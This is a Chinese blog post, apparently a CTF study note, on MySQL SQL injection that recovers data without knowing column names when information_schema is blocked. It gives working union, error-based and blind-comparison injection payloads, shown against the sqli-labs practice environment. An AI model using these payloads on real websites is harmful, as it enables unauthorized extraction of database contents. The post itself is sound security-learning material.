<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/author.jpg">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/author.jpg">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Pisces","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="其实之前也遇到过类似的题目，但是拖延症太严重了，一直没有仔细研究，正好这次国赛初赛也有一道无列名注入的题目，好好学习一下。">
<meta property="og:type" content="article">
<meta property="og:title" content="ctf无列名注入小结">
<meta property="og:url" content="http://example.com/2021/05/19/no-column-sql-injection/index.html">
<meta property="og:site_name" content="k1te&#39;s blog">
<meta property="og:description" content="其实之前也遇到过类似的题目，但是拖延症太严重了，一直没有仔细研究，正好这次国赛初赛也有一道无列名注入的题目，好好学习一下。">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210518205433174.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210518210803424.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210518210852147.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210518211237880.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210518211407558.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210518211454878.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210518212536488.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210518212937276.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210518213822854.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210518214037080.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210518215046288.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210518215915574.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210518220235925.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210518220350816.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210518220505941.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210518220926260.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210518220949025.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210519203436567.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210519212238164.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210519212330950.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210519212616643.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210519212813564.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210519212933236.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210519213310352.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210519213213452.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210519213924873.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210519214151274.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210519215245491.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210519215259111.png">
<meta property="article:published_time" content="2021-05-19T14:10:17.000Z">
<meta property="article:modified_time" content="2021-07-18T07:49:52.704Z">
<meta property="article:author" content="K1te">
<meta property="article:tag" content="web">
<meta property="article:tag" content="ctf">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210518205433174.png">

<link rel="canonical" href="http://example.com/2021/05/19/no-column-sql-injection/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>ctf无列名注入小结 | k1te's blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">k1te's blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2021/05/19/no-column-sql-injection/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/author.jpg">
      <meta itemprop="name" content="K1te">
      <meta itemprop="description" content="看到我请叫我滚去学web">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="k1te's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          ctf无列名注入小结
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2021-05-19 22:10:17" itemprop="dateCreated datePublished" datetime="2021-05-19T22:10:17+08:00">2021-05-19</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2021-07-18 15:49:52" itemprop="dateModified" datetime="2021-07-18T15:49:52+08:00">2021-07-18</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E7%AC%94%E8%AE%B0/" itemprop="url" rel="index"><span itemprop="name">笔记</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>其实之前也遇到过类似的题目，但是拖延症太严重了，一直没有仔细研究，正好这次国赛初赛也有一道无列名注入的题目，好好学习一下。</p>
<a id="more"></a>

<p>无列名注入一般伴随着bypass information_schema，当这个表被过滤的时候，我们只能使用<code>sys.schema_auto_increment_columns</code>、<code>sys.schema_table_statistics_with_buffer</code>、<code>mysql.innodb_table_stats</code>等等进行绕过，但是这些表中一般都没有字段名，只能获得表名，所以当我们知道表名之后，还需要进一步地使用无列名注入</p>
<h2 id="一、列名重复（join……using）"><a href="#一、列名重复（join……using）" class="headerlink" title="一、列名重复（join……using）"></a>一、列名重复（join……using）</h2><p>条件：需要开启报错</p>
<p>直接拿sqli-labs的email表来做演示（后面也会使用这个表）：</p>
<p><img src="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210518205433174.png"></p>
<p>假设我们已经bypass了information_schema并且获得了emails这个表名，这时候我们可以使用<code>?id=1&#39; union select * from (select * from emails a join emails b)c--+</code>dump出第一个字段名：</p>
<p><img src="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210518210803424.png"></p>
<p>紧接着使用<code>?id=1&#39; union select * from (select * from emails a join emails b using(id))c--+</code>dump出第二个字段名：</p>
<p><img src="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210518210852147.png"></p>
<p>一般网上的文章到这里就结束了，但是搞不明白原理是啥（可能是因为我太菜了），所以自己又接着往下研究。</p>
<p>当我们继续使用<code>?id=1&#39; union select * from (select * from emails a join emails b using(id,email_id))c--+</code>，会报列数不一致的错误：</p>
<p><img src="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210518211237880.png"></p>
<p>因为这个时候已经select成功了，但是只有两列，而union前面的语句有三列，所以列数不一致，在命令行里是可以成功select的：</p>
<p><img src="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210518211407558.png"></p>
<p>或者这样：</p>
<p><img src="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210518211454878.png"></p>
<p>所以join……using到底是啥呢，我又去Google了一下：<code>SQL JOIN 子句用于把来自两个或多个表的行结合起来，基于这些表之间的共同字段。</code></p>
<p>join有不同的类型：</p>
<ul>
<li><strong>INNER JOIN</strong>：如果表中有至少一个匹配，则返回行</li>
<li><strong>LEFT JOIN</strong>：即使右表中没有匹配，也从左表返回所有的行</li>
<li><strong>RIGHT JOIN</strong>：即使左表中没有匹配，也从右表返回所有的行</li>
<li><strong>FULL JOIN</strong>：只要其中一个表中存在匹配，则返回行</li>
</ul>
<p>其中inner join 和 join是相同的</p>
<p>security中还有一个users表如下：</p>
<p><img src="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210518212536488.png"></p>
<p>当我们跨表查询对应用户的email的时候就可以使用join语句，有以下三种写法：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> users <span class="keyword">join</span> emails <span class="keyword">on</span> emails.id <span class="operator">=</span> users.id;</span><br><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> users <span class="keyword">join</span> emails <span class="keyword">using</span>(id);</span><br><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> users,emails <span class="keyword">where</span> users.id <span class="operator">=</span> emails.id;</span><br></pre></td></tr></table></figure>


<p><img src="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210518212937276.png"></p>
<p>我们可以看到当我们使用using的时候id这个字段只出现了一次，但是where和on都出现了两次，并且不会报错。</p>
<p>但是如果我们在外边套一层select，情况就不一样了</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">select * from (select * from users join emails on emails.id &#x3D; users.id)a;</span><br><span class="line">select * from (select * from users join emails using(id))a;</span><br><span class="line">select * from (select * from users,emails where users.id &#x3D; emails.id)a;</span><br></pre></td></tr></table></figure>
<p><img src="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210518213822854.png"></p>
<p>可以看到只有using不会报错，其他两个都报了列名重复的错误，并且指出了具体的列名</p>
<p>假设我们不知道任何列名，把后面的on、using、where都删掉：</p>
<p><img src="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210518214037080.png"></p>
<p>都可以爆出第一个字段（虽然说删了之后前面没有区别），但是当我们知道了第一个字段，想要爆出第二个字段的时候，结果就不一样了。（因为email和user只有一个列名重复，所以join两个一样的表（一般都join一样的表），同时还需要给这两个表取两个别名，不然会报表名不唯一的错误:<code>Not unique table/alias: &#39;emails&#39;</code>）：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">select * from (select * from emails a join emails b on a.id &#x3D; b.id)a;</span><br><span class="line">&gt;&gt; ERROR 1060 (42S21): Duplicate column name &#39;id&#39;</span><br><span class="line">select * from (select * from emails a join emails b using(id))a;</span><br><span class="line">&gt;&gt; ERROR 1060 (42S21): Duplicate column name &#39;email_id&#39;</span><br><span class="line">select * from (select * from emails a,emails b where a.id &#x3D; b.id)a;</span><br><span class="line">&gt;&gt; ERROR 1060 (42S21): Duplicate column name &#39;id&#39;</span><br></pre></td></tr></table></figure>
<p><img src="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210518215046288.png"></p>
<p>可以看到，只有using可以dump出第二个字段，原因想必大家看到这里都明白了，即便我们指定了where和on，select出来的表依然有重复的字段，但是using不会，所以第一个和第三个指令依然报错id字段重复，而第二条指令则开始报剩下的字段的名字。</p>
<h2 id="二、通过别名，引用列名（需要使用union）"><a href="#二、通过别名，引用列名（需要使用union）" class="headerlink" title="二、通过别名，引用列名（需要使用union）"></a>二、通过别名，引用列名（需要使用union）</h2><p>条件：有查询内容回显</p>
<p>2021国赛初赛的easy_sql之所以不使用这个方法，是因为union被过滤了，所以这也是一个条件吧。</p>
<p>假设我们不知道emails的字段名，我们可以将他的列名转化为别名：<code>select 1,2 union select * from emails;</code></p>
<p><img src="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210518215915574.png"></p>
<p>然后我们可以引用这个我们已知的别名来获得数据：<code>select 2 from (select 1,2 union select * from emails)x;</code>：</p>
<p><img src="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210518220235925.png"></p>
<p>当反引号被ban的时候可以使用别名：<code>select a from (select 1,2 a union select * from emails)x;</code>(省略了as)</p>
<p><img src="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210518220350816.png"></p>
<p>或者使用双引号：<code>select a from (select 1,&quot;a&quot; union select * from emails)x;</code></p>
<p><img src="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210518220505941.png"></p>
<p>在sqli-lab中的演示：</p>
<p><img src="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210518220926260.png"></p>
<p><img src="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210518220949025.png"></p>
<h2 id="三、比较盲注"><a href="#三、比较盲注" class="headerlink" title="三、比较盲注"></a>三、比较盲注</h2><p>条件：盲注的条件</p>
<p>上面两种方法要么需要报错，要么需要回显，那么盲注的条件下咋办呢，在知道表名的情况下我们可以先select出想要的内容，然后再构造一个内容与其比较，作为盲注时判断的条件。</p>
<p>例如：<code>select * from users limit 1;</code>得到：</p>
<p><img src="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210519203436567.png"></p>
<p>我们可以构造<code>select 1,0,0;</code></p>
<p><img src="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210519212238164.png"></p>
<p>然后与其比较：<code>select (select ((select 1,0,0)&gt;(select * from users limit 1)));</code></p>
<p><img src="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210519212330950.png"></p>
<p>结果为false，说明1不大于第一个字段的值</p>
<p>接着：<code>select (select ((select 2,0,0)&gt;(select * from users limit 1)));</code></p>
<p><img src="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210519212616643.png"></p>
<p>结果为true，说明2大于第一个字段的值，结合上面的可以知道第一个字段的值为1。剩下的以此类推。</p>
<p>当我准备接着注下去的时候，发现报错了：</p>
<p><img src="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210519212813564.png"></p>
<p>仔细和网上的文章对照了一下，发现payload没有问题，猜测是数据库版本的问题，现在使用的版本是5.5：</p>
<p><img src="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210519212933236.png"></p>
<p>抱着怀疑的心态换了个5.7的mysql，然后顺便创建了一个test表：</p>
<p><img src="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210519213310352.png"></p>
<p>然后继续尝试刚刚的payload：<code>select ((select 1,&quot;f&quot;)&gt;(select * from test limit 1));</code></p>
<p><img src="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210519213213452.png"></p>
<p>发现可行，应该是某个版本之后这两者可以进行比较，但是具体哪个版本没有进行尝试（又懒又菜），知道的师傅可以和我说一下。</p>
<p>——————————————————————————</p>
<p>在数据库中操作完之后开始复盘。</p>
<p>首先我们得知道表名，这个上边讲过了；其次是得知道这张表中有多少个字段，这个我认为可以通过order by来确定：</p>
<p><img src="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210519213924873.png"></p>
<p><img src="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210519214151274.png"></p>
<p>然后得知道有多少行，当大于一行的时候得加上limit不然会报错，永远都返回false，这个只能靠尝试和猜测吧。。。不过flag表一般就一行</p>
<p>然后就可以进行盲注了：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?id&#x3D;1&#39; and ((select &#39;1&#39;,0,0)&gt;(select * from users limit 1))--+</span><br><span class="line">?id&#x3D;1&#39; and ((select &#39;2&#39;,0,0)&gt;(select * from users limit 1))--+</span><br></pre></td></tr></table></figure>
<p>结果：</p>
<p><img src="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210519215245491.png"></p>
<p><img src="https://cdn.jsdelivr.net/gh/zk1te/img/image-20210519215259111.png"></p>
<h2 id="四、order-by盲注"><a href="#四、order-by盲注" class="headerlink" title="四、order by盲注"></a>四、order by盲注</h2><p>好像没什么合适的环境，等下回遇到再填坑吧，先贴个链接：<a target="_blank" rel="noopener" href="https://www.chabug.org/ctf/852.html">一道题引发的无列名注入 | ChaBug安全</a></p>
<h2 id="最后"><a href="#最后" class="headerlink" title="最后"></a>最后</h2><p>我的数据库基础不扎实，如果有什么错误的地方还希望师傅们多多包涵，如果能和我交流，指出我的错误就更好啦</p>
<p>参考：</p>
<p><a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/193512">聊一聊bypass information_schema - 安全客，安全资讯平台 (anquanke.com)</a></p>
<p><a target="_blank" rel="noopener" href="http://www.cl4y.top/information%E8%A2%ABban%E7%9A%84%E6%83%85%E5%86%B5%E4%B8%8B%E8%BF%9B%E8%A1%8Csql%E6%B3%A8%E5%85%A5/">information被ban的情况下进行SQL注入 - Cl4y’s SecretCl4y’s Secret</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/m0_46230316/article/details/106668182">无列名注入总结_D1stiny的博客-CSDN博客_无列名注入</a></p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/web/" rel="tag"># web</a>
              <a href="/tags/ctf/" rel="tag"># ctf</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2021/03/14/VNCTF2021/" rel="prev" title="VNCTF2021签到">
      <i class="fa fa-chevron-left"></i> VNCTF2021签到
    </a></div>
      <div class="post-nav-item">
    <a href="/2021/07/26/cyBrics2021/" rel="next" title="CyBRICS2021">
      CyBRICS2021 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%B8%80%E3%80%81%E5%88%97%E5%90%8D%E9%87%8D%E5%A4%8D%EF%BC%88join%E2%80%A6%E2%80%A6using%EF%BC%89"><span class="nav-number">1.</span> <span class="nav-text">一、列名重复（join……using）</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BA%8C%E3%80%81%E9%80%9A%E8%BF%87%E5%88%AB%E5%90%8D%EF%BC%8C%E5%BC%95%E7%94%A8%E5%88%97%E5%90%8D%EF%BC%88%E9%9C%80%E8%A6%81%E4%BD%BF%E7%94%A8union%EF%BC%89"><span class="nav-number">2.</span> <span class="nav-text">二、通过别名，引用列名（需要使用union）</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%B8%89%E3%80%81%E6%AF%94%E8%BE%83%E7%9B%B2%E6%B3%A8"><span class="nav-number">3.</span> <span class="nav-text">三、比较盲注</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%9B%9B%E3%80%81order-by%E7%9B%B2%E6%B3%A8"><span class="nav-number">4.</span> <span class="nav-text">四、order by盲注</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%9C%80%E5%90%8E"><span class="nav-number">5.</span> <span class="nav-text">最后</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="K1te"
      src="/images/author.jpg">
  <p class="site-author-name" itemprop="name">K1te</p>
  <div class="site-description" itemprop="description">看到我请叫我滚去学web</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">10</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">4</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>


  <div class="links-of-blogroll motion-element">
    <div class="links-of-blogroll-title"><i class="fa fa-link fa-fw"></i>
      Links
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="https://chikorita.fun/" title="https:&#x2F;&#x2F;chikorita.fun&#x2F;" rel="noopener" target="_blank">茗哥</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://oatmeal.vip/" title="https:&#x2F;&#x2F;oatmeal.vip&#x2F;" rel="noopener" target="_blank">Oatmeal</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://examine2.top/" title="https:&#x2F;&#x2F;examine2.top&#x2F;" rel="noopener" target="_blank">examine</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://jan.show/" title="https:&#x2F;&#x2F;jan.show&#x2F;" rel="noopener" target="_blank">Jan</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://eastjun.top/" title="https:&#x2F;&#x2F;eastjun.top&#x2F;" rel="noopener" target="_blank">EastJun</a>
        </li>
    </ul>
  </div>

      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">K1te</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://pisces.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Pisces</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
